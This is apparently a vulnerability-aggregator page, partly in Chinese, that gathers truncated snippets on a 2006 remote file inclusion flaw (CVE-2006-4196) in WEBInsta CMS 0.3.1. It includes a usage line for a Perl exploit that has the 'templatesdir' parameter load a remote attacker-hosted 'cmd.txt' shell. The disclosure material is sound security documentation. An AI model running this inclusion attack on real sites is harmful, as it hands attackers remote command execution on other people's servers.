WEBinsta CMS Templates_Dir远程文件包含漏洞

WEBInsta CMS是一款基于PHP的内容管理程序。 WEBInsta CMS不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'index.php'脚本对用户提交的'templatesdir'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 WEBInsta CMS 0.3.1 http://www.webinsta.com/download.html !/usr/bin/perl WEBinsta CMS 0.3.1 templatesdir Remote File Inclusion Explo...

adv45-K-159-2006.txt

ECHOADV45$2006 ----------------------------------------------------------------------------------------- ECHOADV45$2006 WEBinsta CMS 0.3.1 templatesdir Remote File Inclusion Vulnerability ----------------------------------------------------------------------------------------- Author : M.Hasran...

CVE-2006-4196

PHP remote file inclusion vulnerability in index.php in WEBInsta CMS 0.3.1 and possibly earlier allows remote attackers to execute arbitrary PHP code via a URL in the templatesdir parameter...

WEBinsta CMS <= 0.3.1 (templates_dir) Remote File Include Exploit

Exploit for unknown platform in category web applications ================================================================= WEBinsta CMS perl WEBinsta.pl http://target.com/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; Greetz: My Dearest Wife - ping, echo|staff...